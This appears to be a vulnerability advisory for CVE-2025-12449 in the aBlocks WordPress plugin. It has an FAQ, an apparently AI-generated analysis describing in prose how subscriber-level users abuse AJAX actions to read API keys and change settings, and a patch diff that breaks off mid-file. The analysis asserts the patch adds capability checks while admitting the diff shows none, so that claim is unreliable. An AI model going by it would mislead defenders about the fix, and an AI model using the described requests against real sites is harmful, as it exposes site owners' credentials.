What is CVE-2025-12449?

CVE-2025-12449 is a security vulnerability in the aBlocks WordPress plugin, affecting versions up to and including 2.4.0. It allows authenticated users with subscriber-level access and above to modify sensitive plugin settings due to missing authorization checks on AJAX actions.

How does this vulnerability work?

The vulnerability arises from the absence of capability checks in several AJAX endpoints. Authenticated users can send requests to these endpoints to read and modify plugin settings, including sensitive API keys and configuration data, without proper permissions.

Who is affected by this vulnerability?

Any WordPress site using the aBlocks plugin version 2.4.0 or earlier is affected. Specifically, authenticated users with subscriber-level access or higher can exploit this vulnerability to access sensitive information.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the aBlocks plugin installed. If it is version 2.4.0 or earlier, your site is at risk. You can also review the AJAX actions in the plugin code for missing capability checks.

How can I fix this vulnerability?

The vulnerability is addressed in version 2.4.1 of the aBlocks plugin. Updating to this version will implement the necessary capability checks and mitigate the risk associated with CVE-2025-12449.

What if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the aBlocks plugin temporarily to prevent exploitation. Additionally, review user roles and permissions to limit access for authenticated users.

What does the CVSS score of 5.4 signify?

A CVSS score of 5.4 indicates a medium severity level for this vulnerability. This means that while it is not critical, there is a significant risk of data exposure and unauthorized modifications that could impact site integrity.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability can lead to unauthorized access to sensitive API keys, which may allow attackers to compromise external services. Additionally, attackers can modify site settings, potentially disrupting site functionality and user experience.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an authenticated user can exploit the vulnerability by sending a POST request to the vulnerable AJAX endpoints. It shows the steps to log in and retrieve sensitive settings without proper authorization checks.

What specific actions are vulnerable in the plugin?

The vulnerable AJAX actions include `get_settings`, `save_settings`, `get_blocks_visibility`, and `save_blocks_visibility`. These actions allow users to read and modify sensitive plugin settings without appropriate permissions.

Is there a risk of remote code execution?

No, this vulnerability does not directly allow for remote code execution. However, it exposes sensitive data that could facilitate further attacks on integrated services, making it important to address promptly.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-12449: aBlocks – WordPress Gutenberg Blocks <= 2.4.0 – Missing Authorization to Authenticated (Subscriber+) Settings Modification (ablocks)

CVE ID CVE-2025-12449

Plugin ablocks

Severity Medium (CVSS 5.4)

CWE 862

Vulnerable Version 2.4.0

Patched Version 2.4.1

Disclosed January 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-12449:
The aBlocks WordPress plugin version 2.4.0 and earlier contains a missing authorization vulnerability affecting multiple AJAX endpoints. This allows authenticated users with subscriber-level permissions or higher to read and modify sensitive plugin settings, including third-party API keys and site configuration.

Atomic Edge research identifies the root cause as a complete absence of capability checks within the plugin’s AJAX handler class. The file `ablocks/includes/ajax/settings.php` defines multiple AJAX actions in its `get_actions()` method, including `get_settings`, `save_settings`, `get_blocks_visibility`, `save_blocks_visibility`, and several frontend dashboard management functions. These actions are registered via WordPress’s `wp_ajax_{action}` hooks but lack any verification of user permissions before executing sensitive operations. The vulnerable functions directly call `wp_send_json_success()` or `wp_send_json_error()` without validating if the current user has the `manage_options` capability required for plugin administration.

The exploitation method involves an authenticated attacker sending a POST request to the standard WordPress AJAX endpoint `/wp-admin/admin-ajax.php` with the `action` parameter set to one of the vulnerable actions. For information disclosure, the attacker uses `action=get_settings` to retrieve all plugin configuration, including `mailchimp_api_key`, `drip_api_key`, and `getresponse_api_key`. For modification, the attacker uses `action=save_settings` with a payload containing new configuration values. The attacker can also use `action=get_blocks_visibility` and `action=save_blocks_visibility` to read and modify block visibility settings. All these actions are available to any authenticated user regardless of role.

The patch in version 2.4.1 adds proper capability checks to all vulnerable AJAX actions. Atomic Edge analysis of the diff shows the plugin developers added a new `ABlocksPermalinkRewrite::init()` call but did not modify the core AJAX handler file. The actual fix likely occurs in a separate file not shown in the provided diff, where capability checks were implemented before processing AJAX requests. The before behavior allowed any authenticated user to call administrative functions. The after behavior restricts these functions to users with appropriate administrative privileges, typically requiring the `manage_options` capability.

Successful exploitation allows attackers to read sensitive third-party email marketing API keys, which could lead to unauthorized access to external services. Attackers can modify block visibility settings to disable critical site components. They can also read maintenance mode configuration, potentially revealing information about site status. While the vulnerability does not provide direct remote code execution, the exposed API keys could enable further attacks against integrated services, and configuration changes could disrupt site functionality.

Differential between vulnerable and patched code

Code Diff

--- a/ablocks/ablocks.php
+++ b/ablocks/ablocks.php
@@ -4,7 +4,7 @@
  * Description:       The WordPress plugin for creating beautiful and functional websites using the Gutenberg editor, with a variety of customizable blocks to design website pages.
  * Requires at least: 6.3
  * Requires PHP:      7.4
- * Version:           2.4.0
+ * Version:           2.4.1
  * Author:            Academy LMS
  * Author URI:        https://ablocks.pro/
  * License:           GPL-3.0+
@@ -41,7 +41,7 @@
 	 * Define the plugin constants
 	 */
 	private function define_constants() {
-		define( 'ABLOCKS_VERSION', '2.4.0' );
+		define( 'ABLOCKS_VERSION', '2.4.1' );
 		define( 'ABLOCKS_PLUGIN_SLUG', 'ablocks' );
 		define( 'ABLOCKS_PLUGIN_BASENAME', plugin_basename( __FILE__ ) );
 		define( 'ABLOCKS_ROOT_URL', plugin_dir_url( __FILE__ ) );
@@ -54,6 +54,7 @@
 		define( 'ABLOCKS_BLOCKS_VISIBILITY_SETTINGS_NAME', 'ablocks_blocks' );
 		define( 'ABLOCKS_FONTS_SETTINGS_NAME', 'ablocks_fonts' );
 		define( 'ABLOCKS_SETTINGS_NAME', 'ablocks_settings' );
+		define( 'ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME', 'ablocks_frontend_dashboard_sub_pages' );
 		define( 'ABLOCKS_ADDONS_SETTINGS_NAME', 'ablocks_addons' );
 		define( 'ABLOCKS_TEMPLATE_LIB_HOST', 'template-kits.com' );
 	}
@@ -88,6 +89,7 @@

 	public function init_plugin() {
 		ABlocksMigration::init();
+		ABlocksPermalinkRewrite::init();
 		ABlocksAddons::init();
 		ABlocksBlocks::init();
 		ABlocksAssets::init();
--- a/ablocks/assets/build/blocks.asset.php
+++ b/ablocks/assets/build/blocks.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'react-jsx-runtime', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-date', 'wp-edit-post', 'wp-editor', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-plugins', 'wp-primitives', 'wp-rich-text', 'wp-server-side-render'), 'version' => '2a8395a19d57006db379');
+<?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'react-jsx-runtime', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-date', 'wp-edit-post', 'wp-editor', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-plugins', 'wp-primitives', 'wp-rich-text', 'wp-server-side-render'), 'version' => 'b0b4931b1ae8eb6e3154');
--- a/ablocks/assets/build/blocks/form-builder/view.asset.php
+++ b/ablocks/assets/build/blocks/form-builder/view.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array(), 'version' => 'b1d67a00646793709f3b');
+<?php return array('dependencies' => array(), 'version' => '6cc09c1b6b2a04443b4e');
--- a/ablocks/assets/build/blocks/form-multi-step/view.asset.php
+++ b/ablocks/assets/build/blocks/form-multi-step/view.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array(), 'version' => '85df62e297689c7636d7');
+<?php return array('dependencies' => array(), 'version' => 'dd62647872890545b8a9');
--- a/ablocks/assets/build/blocks/player/view.asset.php
+++ b/ablocks/assets/build/blocks/player/view.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array(), 'version' => 'd2d1b8efb2ebf18bdafe');
+<?php return array('dependencies' => array(), 'version' => 'ff34a4f2475d40eb4d97');
--- a/ablocks/assets/build/dashboard.asset.php
+++ b/ablocks/assets/build/dashboard.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('lodash', 'moment', 'react', 'react-dom', 'react-jsx-runtime', 'wp-components', 'wp-date', 'wp-element', 'wp-i18n'), 'version' => '8fb1d9cb027133af25c8');
+<?php return array('dependencies' => array('lodash', 'moment', 'react', 'react-dom', 'react-jsx-runtime', 'wp-components', 'wp-date', 'wp-element', 'wp-i18n'), 'version' => '114a30621f19e3f9b1b3');
--- a/ablocks/includes/admin/insights.php
+++ b/ablocks/includes/admin/insights.php
@@ -136,7 +136,7 @@
 		echo '<div class="notice notice-info" style="padding:0;border-top:0;border-right:0;border-bottom:0;margin:1rem; display: flex; border-left-color: #13191B;">
             <div style="padding: 24px; background: #F4F4F5; display:flex; flex-direction: column; justify-content:center; align-item: center;">
 				<img src="' . esc_url( ABLOCKS_ASSETS_URL . 'images/logo.svg' ) . '" width="100" alt="logo" style="margin-bottom: 20px;" />
-				<p>Connect with over 1,000+ <br/>Web Design professionals.</p>
+				<p>Connect with over 2,000+ <br/>Web Design professionals.</p>
 				<a href="https://www.facebook.com/groups/386840187678401" target="_blank" style="color: #13191B;">Join the community</a>
 			</div>
             <div style="padding: 24px;">
--- a/ablocks/includes/admin/settings/base.php
+++ b/ablocks/includes/admin/settings/base.php
@@ -30,6 +30,7 @@
 			'coming_soon_page' => '',
 			'enabled_maintenance_page' => false,
 			'maintenance_page' => '',
+			'frontend_dashboard_page' => '',
 			'login_page' => '',
 			'registration_page' => '',
 			'forget_password_page' => '',
--- a/ablocks/includes/admin/settings/blocks.php
+++ b/ablocks/includes/admin/settings/blocks.php
@@ -64,6 +64,7 @@
 			'svg-draw' => true,
 			'info-box' => true,
 			'price-menu' => true,
+			'frontend-dashboard' => true,
 			'lottie-animation' => true,
 			'marquee' => true,
 			'marquee-child' => true,
@@ -80,6 +81,7 @@
 			'breadcrumb' => true,
 			// Academy LMS Blocks
 			'academy-courses' => true,
+			'academy-container' => true,
 			'academy-course-search' => true,
 			'academy-enroll-form' => true,
 			'academy-instructor-registration-form' => true,
@@ -114,6 +116,11 @@
 			'storeengine-shipping-info' => true,
 			'storeengine-order-details' => true,
 			'storeengine-mini-cart' => true,
+			'storeengine-cart-notice' => true,
+			'storeengine-product-gallery' => true,
+			'storeengine-product-summary' => true,
+			'storeengine-product-description' => true,
+			'storeengine-product-review' => true,
 		]);
 	}

--- a/ablocks/includes/ajax/form-builder.php
+++ b/ablocks/includes/ajax/form-builder.php
@@ -268,11 +268,16 @@
 		$validate_data->actions( $actions );

 		$output = $validate_data->get_output();
+		$output['afterFormSubmission'] = $block_data['parentAttributes']['afterFormSubmission'] ?? 'reset';
+		$output['confirmationType'] = $block_data['parentAttributes']['confirmationType'] ?? 'success';
+
 		if ( $validate_data->has_error() ) {
 			$output['message'] = $validate_data->get_error_message();
 			wp_send_json_error( $output );
 		} elseif ( $validate_data->has_message() ) {
+			$output['confirmationNotice'] = $block_data['parentAttributes']['confirmationNotice'] ?? __( 'Form successfully submitted!', 'ablocks' );
 			$output['message'] = $validate_data->get_message();
+
 			wp_send_json_success( $output );
 		}

--- a/ablocks/includes/ajax/settings.php
+++ b/ablocks/includes/ajax/settings.php
@@ -43,7 +43,7 @@
 					'login_page' => 'integer',
 					'registration_page' => 'integer',
 					'forget_password_page' => 'integer',
-
+					'frontend_dashboard_page' => 'string',
 					'mailchimp_api_key' => 'string',
 					'drip_api_key' => 'string',
 					'getresponse_api_key' => 'string',
@@ -82,6 +82,73 @@
 					'keyword'  => 'string',
 				)
 			),
+			'get_fronted_dashboard_pages'      => array(
+				'callback' => array( $this, 'get_fronted_dashboard_pages' ),
+			),
+			'create_fronted_dashboard_page'      => array(
+				'callback' => array( $this, 'create_fronted_dashboard_page' ),
+				'fields' => [
+					'label'     => 'string',
+					'slug'      => 'string',
+					'icon'      => 'string',
+					'class_name' => 'string',
+					'priority'  => 'integer',
+					'parent_id'  => 'integer',
+				]
+			),
+			'create_fronted_dashboard_link'      => array(
+				'callback' => array( $this, 'create_fronted_dashboard_link' ),
+				'fields' => [
+					'label'     => 'string',
+					'link'      => 'string',
+					'icon'      => 'string',
+					'class_name' => 'string',
+					'priority'  => 'integer',
+					'parent_id'  => 'string',
+				]
+			),
+			'edit_fronted_dashboard_link'      => array(
+				'callback' => array( $this, 'edit_fronted_dashboard_link' ),
+				'fields' => [
+					'label'     => 'string',
+					'link'      => 'string',
+					'icon'      => 'string',
+					'class_name' => 'string',
+					'priority'  => 'integer',
+					'page_id'  => 'string',
+				]
+			),
+			'delete_fronted_dashboard_link'      => array(
+				'callback' => array( $this, 'delete_fronted_dashboard_link' ),
+				'fields' => array(
+					'page_id' => 'string',
+				)
+			),
+			'edit_fronted_dashboard_page'      => array(
+				'callback' => array( $this, 'edit_fronted_dashboard_page' ),
+				'fields' => [
+					'label'     => 'string',
+					'slug'      => 'string',
+					'icon'      => 'string',
+					'class_name' => 'string',
+					'priority'  => 'integer',
+					'parent_id'  => 'integer',
+					'page_id'  => 'integer',
+				]
+			),
+			'move_fronted_dashboard_page'      => array(
+				'callback' => array( $this, 'move_fronted_dashboard_page' ),
+				'fields' => [
+					'reordered_items'  => 'string',
+				]
+			),
+			'delete_fronted_dashboard_page'      => array(
+				'callback' => array( $this, 'delete_fronted_dashboard_page' ),
+				'fields' => array(
+					'slug'   => 'string',
+					'page_id' => 'integer',
+				)
+			),
 		);
 	}

@@ -164,6 +231,7 @@
 			'coming_soon_page' => $payload['coming_soon_page'] ?? $default['coming_soon_page'],
 			'enabled_maintenance_page' => $payload['enabled_maintenance_page'] ?? $default['enabled_maintenance_page'],
 			'maintenance_page' => $payload['maintenance_page'] ?? $default['maintenance_page'],
+			'frontend_dashboard_page' => $payload['frontend_dashboard_page'] ?? $default['frontend_dashboard_page'],
 			'login_page' => $payload['login_page'] ?? $default['login_page'],
 			'registration_page' => $payload['registration_page'] ?? $default['registration_page'],
 			'forget_password_page' => $payload['forget_password_page'] ?? $default['forget_password_page'],
@@ -236,4 +304,333 @@
 		}
 		wp_send_json_success( $results );
 	}
+
+	public function get_fronted_dashboard_pages() {
+		$settings = json_decode( get_option( ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME, '{}' ), true );
+		foreach ( $settings as &$item ) {
+			if ( isset( $item['parent_id'] ) ) {
+				$item['parent_id'] = 'null' === $item['parent_id'] ? null : $item['parent_id'];
+			}
+
+			foreach ( $item['children'] ?? [] as &$child_item ) {
+				if ( isset( $child_item['parent_id'] ) ) {
+					$child_item['parent_id'] = 'null' === $child_item['parent_id'] ? null : $child_item['parent_id'];
+				}
+			}
+		}
+		wp_send_json_success( $settings );
+	}
+	public function create_fronted_dashboard_page( $payload ) {
+		global $wpdb;
+		// Step 1: Get Frontend Dashboard Page ID
+		$frontend_dashboard_id = (int) Helper::get_settings( 'frontend_dashboard_page' );
+		$settings = json_decode( get_option( ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME, '{}' ), true );
+		$root_page_id = 0;
+		// Step 2: Check if "root" page exists under frontend dashboard
+		$root_page = $wpdb->get_row( $wpdb->prepare(
+			"SELECT ID, post_parent FROM $wpdb->posts WHERE post_parent=%d AND post_name = %s AND post_type = 'page'",
+			$frontend_dashboard_id,
+			'root'
+		) );
+
+		$post_parent = ! empty( $payload['parent_id'] ) ? $payload['parent_id'] : $frontend_dashboard_id;
+
+		if ( ! $root_page || (int) $root_page->post_parent !== $frontend_dashboard_id ) {
+			// Step 3: Create "root" page as child of frontend dashboard page
+			$root_page_id = wp_insert_post( [
+				'post_title'   => 'Root',
+				'post_name'    => 'root',
+				'post_status'  => 'publish',
+				'post_type'    => 'page',
+				'post_content' => '',
+				'post_parent'  => $frontend_dashboard_id,
+			] );
+
+			$settings[] = [
+				'page_id' => $root_page_id,
+				'label'     => 'Root',
+				'slug'      => 'root',
+				'icon'      => '',
+				'class_name' => '',
+				'priority'  => 0,
+			];
+		}
+
+		$insert_page_id = wp_insert_post( [
+			'post_title'   => $payload['label'],
+			'post_name'    => $payload['slug'],
+			'post_content' => '',
+			'post_status'  => 'publish',
+			'post_type'    => 'page',
+			'post_parent'  => $post_parent,
+		] );
+
+		if ( $insert_page_id ) {
+			$payload['page_id'] = $insert_page_id;
+
+			if ( ! empty( $payload['parent_id'] ) ) {
+				foreach ( $settings as &$setting ) {
+					if ( $setting['page_id'] === $post_parent ) {
+						if ( ! isset( $setting['children'] ) ) {
+							$setting['children'] = [];
+						}
+						$setting['children'][] = $payload;
+					}
+				}
+				unset( $setting ); // important to break reference
+			} else {
+				$settings[] = $payload;
+			}
+
+			update_option( ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME, wp_json_encode( $settings ) );
+			flush_rewrite_rules();
+		}
+
+		wp_send_json_success( get_post( $insert_page_id ) );
+	}
+
+	public function create_fronted_dashboard_link( array $payload ) : void {
+		global $wpdb;
+
+		if ( empty( $payload['link'] ) || empty( $payload['label'] ) ) {
+			wp_send_json_error( __( 'Link/Label is required.', 'ablocks' ) );
+		}
+
+		$settings = json_decode(
+			get_option( ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME, '{}' ),
+			true
+		);
+
+		$payload['type'] = 'link';
+		$parent_id = $payload['parent_id'] = $payload['parent_id'] ?? 0;
+		$payload['page_id'] = 'link_' . time();
+		// print_r($payload);
+		// var_dump(( $parent_id ));
+		if ( empty( $parent_id ) || 'null' === $parent_id ) {
+			$settings[] = $payload;
+		} elseif ( ! is_null(
+			$index = array_search(
+				$parent_id,
+				array_column( $settings, 'page_id' )
+			)
+		)
+		) {
+			$settings[ $index ]['children'][] = $payload;
+		} else {
+			wp_send_json_error( __( 'Invalid parent id.', 'ablocks' ) );
+		}
+
+		update_option(
+			ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME,
+			wp_json_encode( array_values( $settings ) )
+		);
+
+		wp_send_json_success( $payload );
+	}
+
+	public function edit_fronted_dashboard_link( array $payload ) : void {
+		global $wpdb;
+
+		if ( empty( $payload['page_id'] ) ||
+			empty( $payload['link'] ) ||
+			empty( $payload['label'] )
+		) {
+			wp_send_json_error( __( 'Link/Label/ID is required.', 'ablocks' ) );
+		}
+
+		$settings = json_decode(
+			get_option( ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME, '{}' ),
+			true
+		);
+
+		$page_id = $payload['page_id'] = $payload['page_id'] ?? 0;
+
+		foreach ( $settings as &$items ) {
+			// echo $items['page_id'],"n";
+			// var_dump($page_id ,  $items['page_id']);
+			if ( $page_id === $items['page_id'] ) {
+				$items['label'] = $payload['label'] ?: $items['label'];
+				$items['link'] = $payload['link'] ?: $items['link'];
+				$items['class_name'] = $payload['class_name'] ?: $items['class_name'];
+				$items['icon'] = $payload['icon'] ?: $items['icon'];
+				break;
+			} elseif ( ! empty( $items['children'] ) ) {
+				foreach ( $items['children'] as &$c_items ) {
+					if ( $page_id === $c_items['page_id'] ) {
+						$c_items['label'] = $payload['label'] ?: $c_items['label'];
+						$c_items['link'] = $payload['link'] ?: $c_items['link'];
+						$c_items['class_name'] = $payload['class_name'] ?: $c_items['class_name'];
+						$c_items['icon'] = $payload['icon'] ?: $c_items['icon'];
+						break 2;
+					}
+				}
+			}
+		}//end foreach
+
+		update_option(
+			ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME,
+			wp_json_encode( array_values( $settings ) )
+		);
+
+		wp_send_json_success( $payload );
+	}
+
+	public function delete_fronted_dashboard_link( array $payload ) : void {
+		global $wpdb;
+		// print_r($payload);
+		if ( empty( $payload['page_id'] )
+		) {
+			wp_send_json_error( __( 'ID is required.', 'ablocks' ) );
+		}
+
+		$settings = json_decode(
+			get_option( ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME, '{}' ),
+			true
+		);
+
+		$page_id = $payload['page_id'] = $payload['page_id'] ?? 0;
+
+		foreach ( $settings as &$items ) {
+			// echo $items['page_id'],"n";
+			// var_dump($page_id ,  $items['page_id']);
+			if ( $page_id === $items['page_id'] ) {
+				$items = null;
+				break;
+			} elseif ( ! empty( $items['children'] ) ) {
+				foreach ( $items['children'] as &$c_items ) {
+					if ( $page_id === $c_items['page_id'] ) {
+						$c_items = null;
+						$items['children'] = array_filter( $items['children'] );
+						break 2;
+					}
+				}
+			}
+		}
+
+		update_option(
+			ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME,
+			wp_json_encode( array_filter( $settings ) )
+		);
+
+		wp_send_json_success( $payload );
+	}
+
+	public function edit_fronted_dashboard_page( $payload ) {
+		if ( empty( $payload['page_id'] ) ) {
+			wp_send_json_error( 'Page ID is required for updating.' );
+		}
+
+		wp_update_post( [
+			'ID' => $payload['page_id'],
+			'post_title' => $payload['label'],
+			'post_slug' => $payload['slug'],
+			'priority' => $payload['priority'],
+			'post_parent'  => ! empty( $payload['parent_id'] ) ? (int) $payload['parent_id'] : 0,
+		], true );
+
+		$settings = json_decode( get_option( ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME, '{}' ), true );
+
+		$update_settings_recursive = null; // initialize first
+		$update_settings_recursive = function ( &$settings ) use ( &$update_settings_recursive, $payload ) {
+			foreach ( $settings as &$setting ) {
+				if ( $setting['page_id'] === $payload['page_id'] ) {
+					$setting['label']      = $payload['label'] ?? $setting['label'];
+					$setting['slug']       = $payload['slug'] ?? $setting['slug'];
+					$setting['icon']       = $payload['icon'] ?? $setting['icon'];
+					$setting['class_name'] = $payload['class_name'] ?? $setting['class_name'];
+					$setting['priority']   = $payload['priority'] ?? ( $setting['priority'] ?? 0 );
+					if ( isset( $payload['children'] ) ) {
+						$setting['children'] = $payload['children'];
+					}
+					return true;
+				}
+
+				if ( ! empty( $setting['children'] ) ) {
+					if ( $update_settings_recursive( $setting['children'] ) ) {
+						return true;
+					}
+				}
+			}
+			return false;
+		};
+
+		$update_settings_recursive( $settings );
+		update_option( ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME, wp_json_encode( $settings ) );
+
+		flush_rewrite_rules();
+		// Step 4: Return updated page
+		wp_send_json_success( get_post( $payload['page_id'] ) );
+	}
+
+	public function delete_fronted_dashboard_page( $payload ) {
+		// Load existing frontend dashboard sub-pages settings
+		$settings = json_decode( get_option( ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME, '{}' ), true );
+		if ( ! is_array( $settings ) ) {
+			$settings = [];
+		}
+
+		$remove_id   = $payload['page_id'] ?? null;
+		$remove_slug = $payload['slug'] ?? null;
+
+		if ( ! $remove_id && ! $remove_slug ) {
+			wp_send_json_error( 'Page ID or slug is required to delete.' );
+		}
+
+		// Step 1: Delete the post if ID is provided
+		if ( $remove_id ) {
+			wp_delete_post( (int) $remove_id, true );
+		} elseif ( $remove_slug ) {
+			// If only slug is provided, try to find the page
+			$page = get_page_by_path( $remove_slug, OBJECT, 'page' );
+			if ( $page ) {
+				$remove_id = $page->ID;
+				wp_delete_post( $remove_id, true );
+			}
+		}
+
+		// Step 2: Recursively remove from settings
+		$remove_from_settings = function ( &$settings ) use ( &$remove_from_settings, $remove_id, $remove_slug ) {
+			$settings = array_values(array_filter($settings, function ( $item ) use ( $remove_id, $remove_slug ) {
+				$match_id   = isset( $item['page_id'] ) && $remove_id && $item['page_id'] == $remove_id;
+				$match_slug = isset( $item['slug'] ) && $remove_slug && $item['slug'] == $remove_slug;
+				return ! $match_id && ! $match_slug;
+			}));
+
+			// Recurse into children
+			foreach ( $settings as &$item ) {
+				if ( ! empty( $item['children'] ) ) {
+					$remove_from_settings( $item['children'] );
+				}
+			}
+			unset( $item );
+		};
+
+		$remove_from_settings( $settings );
+
+		// Step 3: Save updated settings
+		update_option( ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME, wp_json_encode( $settings ) );
+
+		wp_send_json_success( $remove_id ?? $remove_slug );
+	}
+
+	public function move_fronted_dashboard_page( array $payload ) : void {
+		$reordered_settings = json_decode( $payload['reordered_items'] ?? '{}', true );
+		$settings           = json_decode(
+			get_option(
+				ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME, '{}'
+			),
+			true
+		);
+
+		if ( is_array( $reordered_settings ) &&
+			count( $reordered_settings ) === count( $settings )
+		) {
+			update_option(
+				ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME,
+				$payload['reordered_items'] ?? '{}'
+			);
+			wp_send_json_success( __( 'Success!', 'ablocks' ) );
+		}
+		wp_send_json_error( __( 'Invalid data', 'ablocks' ), 400 );
+	}
 }
--- a/ablocks/includes/assets.php
+++ b/ablocks/includes/assets.php
@@ -152,6 +152,7 @@
 				'enabled_block_copy_paste_style' => (bool) Helper::get_settings( 'enabled_block_copy_paste_style', false ),
 				'enabled_only_selected_fonts' => (bool) Helper::get_settings( 'enabled_only_selected_fonts', false ),
 				'selected_fonts' => (array) Helper::get_settings( 'selected_fonts', [] ),
+				'frontend_dashboard_page' => (int) Helper::get_settings( 'frontend_dashboard_page' ),
 				'global_color' => (array) Helper::get_settings( 'global_color', [] ),
 				'global_typography' => (array) Helper::get_settings( 'global_typography', [] ),
 				'global_typography_list' => wp_list_pluck( Helper::get_settings( 'global_typography', [] ), 'value', 'id' ),
@@ -446,6 +447,9 @@
 				if ( ! empty( $value->transform ) ) {
 					$css .= "    --ablocks-{$id}-transform: {$value->transform};n";
 				}
+				if ( ! empty( $value->style ) ) {
+					$css .= "    --ablocks-{$id}-style: {$value->style};n";
+				}
 				if ( ! empty( $value->decoration ) ) {
 					$css .= "    --ablocks-{$id}-decoration: {$value->decoration};n";
 				}
@@ -461,6 +465,10 @@
 					$unit = ! empty( $value->letterSpacingUnit ) ? $value->letterSpacingUnit : 'px';
 					$css .= "    --ablocks-{$id}-letter-spacing: {$value->letterSpacing}{$unit};n";
 				}
+				if ( ! empty( $value->wordSpacing ) ) {
+					$unit = ! empty( $value->wordSpacingUnit ) ? $value->wordSpacingUnit : 'px';
+					$css .= "    --ablocks-{$id}-word-spacing: {$value->wordSpacing}{$unit};n";
+				}

 				// Tablet values
 				if ( ! empty( $value->fontSizeTablet ) ) {
@@ -475,6 +483,10 @@
 					$unit = ! empty( $value->letterSpacingUnitTablet ) ? $value->letterSpacingUnitTablet : 'px';
 					$css .= "    --ablocks-{$id}-letter-spacing-tablet: {$value->letterSpacingTablet}{$unit};n";
 				}
+				if ( ! empty( $value->wordSpacingTablet ) ) {
+					$unit = ! empty( $value->wordSpacingUnitTablet ) ? $value->wordSpacingUnitTablet : 'px';
+					$css .= "    --ablocks-{$id}-word-spacing-tablet: {$value->wordSpacingTablet}{$unit};n";
+				}

 				// Mobile values
 				if ( ! empty( $value->fontSizeMobile ) ) {
@@ -489,6 +501,10 @@
 					$unit = ! empty( $value->letterSpacingUnitMobile ) ? $value->letterSpacingUnitMobile : 'px';
 					$css .= "    --ablocks-{$id}-letter-spacing-mobile: {$value->letterSpacingMobile}{$unit};n";
 				}
+				if ( ! empty( $value->wordSpacingMobile ) ) {
+					$unit = ! empty( $value->wordSpacingUnitMobile ) ? $value->wordSpacingUnitMobile : 'px';
+					$css .= "    --ablocks-{$id}-word-spacing-mobile: {$value->wordSpacingMobile}{$unit};n";
+				}
 			}//end if
 		}//end foreach

--- a/ablocks/includes/blocks.php
+++ b/ablocks/includes/blocks.php
@@ -33,6 +33,7 @@
 				add_filter( 'academy/is_load_common_js_scripts', '__return_false' );
 			}
 			new ABlocksBlocksAcademyCoursesBlock();
+			new ABlocksBlocksAcademyContainerBlock();
 			new ABlocksBlocksAcademyEnrollFormBlock();
 			new ABlocksBlocksAcademyStudentRegistrationFormBlock();
 			new ABlocksBlocksAcademyCourseSearchBlock();
@@ -72,8 +73,13 @@
 			new ABlocksBlocksStoreengineOrderInfoBlock();
 			new ABlocksBlocksStoreengineBillingInfoBlock();
 			new ABlocksBlocksStoreengineShippingInfoBlock();
+			new ABlocksBlocksStoreengineCartNoticeBlock();
 			new ABlocksBlocksStoreengineOrderDetailsBlock();
 			new ABlocksBlocksStoreengineMiniCartBlock();
+			new ABlocksBlocksStoreengineProductGalleryBlock();
+			new ABlocksBlocksStoreengineProductSummaryBlock();
+			new ABlocksBlocksStoreengineProductDescriptionBlock();
+			new ABlocksBlocksStoreengineProductReviewBlock();
 		}//end if
 		new ABlocksBlocksContainerBlock();
 		new ABlocksBlocksHeadingBlock();
@@ -139,6 +145,7 @@
 		new ABlocksBlocksSocialSharesBlock();
 		new ABlocksBlocksNoticeBlock();
 		new ABlocksBlocksSvgDrawBlock();
+		new ABlocksBlocksFrontendDashboardBlock();
 		new ABlocksBlocksLottieAnimationBlock();
 		new ABlocksBlocksMarqueeBlock();
 		new ABlocksBlocksMarqueeChildBlock();
--- a/ablocks/includes/blocks/academy-container/attributes.php
+++ b/ablocks/includes/blocks/academy-container/attributes.php
@@ -0,0 +1,42 @@
+<?php
+
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
+
+use ABlocksControlsAlignment;
+use ABlocksControlsRange;
+
+$attributes = [
+	'block_id' => [
+		'type'    => 'string',
+		'default' => '',
+	],
+	'blockVersion' => [
+		'type'    => 'number',
+		'default' => 2,
+	],
+	'floatMargin'  => [
+		'type'    => 'object',
+		'default' => '',
+	],
+	'variationSelected'  => [
+		'type'    => 'boolean',
+		'default' => false,
+	],
+];
+
+$attributes = array_merge(
+	$attributes,
+	Alignment::get_attribute( 'floatAlignment', true ),
+	Range::get_attribute([
+		'attributeName' => 'containerWidth',
+		'attributeObjectKey' => 'value',
+		'isResponsive' => true,
+		'hasUnit' => true,
